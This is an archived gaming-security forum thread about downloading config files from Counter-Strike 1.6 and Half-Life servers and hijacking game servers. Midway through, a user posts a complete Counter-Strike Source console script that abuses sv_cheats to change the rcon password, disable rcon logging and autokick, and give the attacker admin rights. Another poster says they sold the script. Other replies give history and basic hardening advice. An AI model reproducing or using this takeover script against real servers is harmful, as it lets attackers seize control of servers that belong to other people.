Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 15:26

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 16 posts ] 
Author Message
 Post subject: CS 1.6 sv_allowdownload 1
PostPosted: 21 Dec 2008 19:34 

Joined: 21 Dec 2008 19:01
Posts: 9
Hey everyone.
Im new here.
I was reading about q3dirtrav wich its possible to download sv files from a server with allowdownload 1.
So in Counter Strike 1.6 its possible to use this bug for donwloading files as well? If so, how? q3dirtrav is only for q3 engine based games.

Thanks a lot


Top
 Profile  
 
 
 Post subject: Re: CS 1.6 sv_allowdownload 1
PostPosted: 21 Dec 2008 21:27 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
I can't give comments on the latest versions because I don't touch HL by years.
anyway the following comes from the far 2003:

http://www.securityfocus.com/archive/1/344996

valve limited the problem adding a list of extensions which can't be downloaded in version x.1.1.1e: cfg, lst, exe, vbs, com, bat, dll, ini and log

I don't know what is the current situation and level of security anyway downloads (and uploads because if I'm not in error HL can allow them too) are ever a security risk


Top
 Profile  
 
 Post subject: Re: CS 1.6 sv_allowdownload 1
PostPosted: 21 Dec 2008 21:33 

Joined: 21 Dec 2008 19:01
Posts: 9
So.. simply type on ingame console:
cmd dlfile server.cfg ?
If so, nothing seems to be happened.

Where the downloaded files usually go?


Top
 Profile  
 
 Post subject: Re: CS 1.6 sv_allowdownload 1
PostPosted: 21 Dec 2008 21:38 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
yes in hl it's enough to type cmd dlfile filename
if I'm not in error HL saves the downloaded files in its root folder


Top
 Profile  
 
 Post subject: Re: CS 1.6 sv_allowdownload 1
PostPosted: 21 Dec 2008 22:00 

Joined: 21 Dec 2008 19:01
Posts: 9
Ok.
I think thats already fixed. I cant download nothing from my server.
Any other way to get CS server files?

Thanks


Top
 Profile  
 
 Post subject: Re: CS 1.6 sv_allowdownload 1
PostPosted: 21 Dec 2008 22:49 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
no one that I know


Top
 Profile  
 
 Post subject: Re: CS 1.6 sv_allowdownload 1
PostPosted: 22 Dec 2008 23:14 

Joined: 21 Dec 2008 19:01
Posts: 9
I was searching on internet I and found a script that could change the rcon_pass in a server with sv_cheats 1
This is for CS source. I was wondering if it may work with 1.6:

Code:
ent_create point_servercommand; ent_setname mine
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "rcon_password omg-im-so-cool"
ent_fire mine command "sv_rcon_log 0"
ent_fire mine command "mp_autokick 0"

//PRIVATE SUCCESS MSG FOR SERVERS WITH MANI ADMIN
ent_fire mine command "ma_psay PLAYERNAME rcon_password changed!"

//GIVE MANI ADMIN
    ent_fire mine command "ma_client addclient client_0l"
    ent_fire mine command "ma_client addsteam client_0l YOURSTEAMID"
    ent_fire mine command "ma_client setaflag client_0l +#"
    ent_fire mine command "ma_client setiflag client_0l +#"
    ent_fire mine kill

rcon_password omg-im-so-cool
echo "RCON EXPLOIT EXECUTED Garotinhos, im in charge!! =] [Script by steglich]"


someone got it?


Top
 Profile  
 
 Post subject: Re: CS 1.6 sv_allowdownload 1
PostPosted: 13 Jan 2009 01:57 

Joined: 13 Jan 2009 01:48
Posts: 1
Can't work on HL1 mods.


Top
 Profile  
 
 Post subject: Re: CS 1.6 sv_allowdownload 1
PostPosted: 13 Jan 2009 15:39 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
off topic:
just for curiosity I tried to find the other places where that script pasted by gabrielfaria was posted (yes I know, I have nothing better to do now) and noticed something funny.
that script has been "assigned" to at least 3 different "authors" ah ah ah thieves :)


Top
 Profile  
 
 Post subject: Re: CS 1.6 sv_allowdownload 1
PostPosted: 02 Feb 2009 06:32 

Joined: 02 Feb 2009 06:29
Posts: 13
Their are actually 4 original authors of this script they would be Mani, Ninja, iON VASH, myself (redskull). Their is also a event scripts exploit founded by a dude named vash and a dude named Backwords surfer. its actully very sexy


Top
 Profile  
 
 Post subject: Re: CS 1.6 sv_allowdownload 1
PostPosted: 02 Feb 2009 13:57 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
the fact is that in the scripts I saw casually on internet the listed authors are not those listed by you :)


Top
 Profile  
 
 Post subject: Re: CS 1.6 sv_allowdownload 1
PostPosted: 03 Feb 2009 03:14 

Joined: 02 Feb 2009 06:29
Posts: 13
=D thats very funny. we've had it created for about a little over 1 maybe 2. i was selling it for a long time. then it got leaked and we just pubed it


Top
 Profile  
 
 Post subject: Re: CS 1.6 sv_allowdownload 1
PostPosted: 14 Jan 2010 09:38 

Joined: 11 Jan 2010 12:43
Posts: 15
Hi and my problem is same in case of CS too. Someone said he will hack the server in 30 seconds and he did it in 13 seconds. Like he got my rcon password in 13 seconds, every time I changed it...What could be the reason?


Top
 Profile  
 
 Post subject: Re: CS 1.6 sv_allowdownload 1
PostPosted: 14 Jan 2010 14:48 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
could exist tons of reasons and there are tons of informations omitted so it's easier to ignore your post.
in any case:
- updated all your software (server/mod/blah) to the latest known version
- don't store your rcon password in the files, NO password in NO files.
that's a starting point


Top
 Profile  
 
 Post subject: Re: CS 1.6 sv_allowdownload 1
PostPosted: 15 Jan 2010 08:23 

Joined: 11 Jan 2010 12:43
Posts: 15
So is there any tool just like q3dirtrav for CS 1.6 to download config files or any way to jack any other file on the server?


Top
 Profile  
 
 Post subject: Re: CS 1.6 sv_allowdownload 1
PostPosted: 15 Jan 2010 09:16 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
I have never played or used CS (1.6, source and so on) in all my life so I don't have the minimal idea.
I simply performed some vulnerability research and protocol reversing the previous summer and from my tests was possible to both upload and download files (throught some protocol modifications so I don't have the minimal idea how to test it from the game) but while the first one was vulnerable to directory traversal the second one wasn't and if I'm not in error there were also some extensions checks (I can't be more detailed because I don't remember everything, in any case if no advisory was released means it wasn't vulnerable and be sure that when I test something I test it at 360 degrees).


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 16 posts ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
cron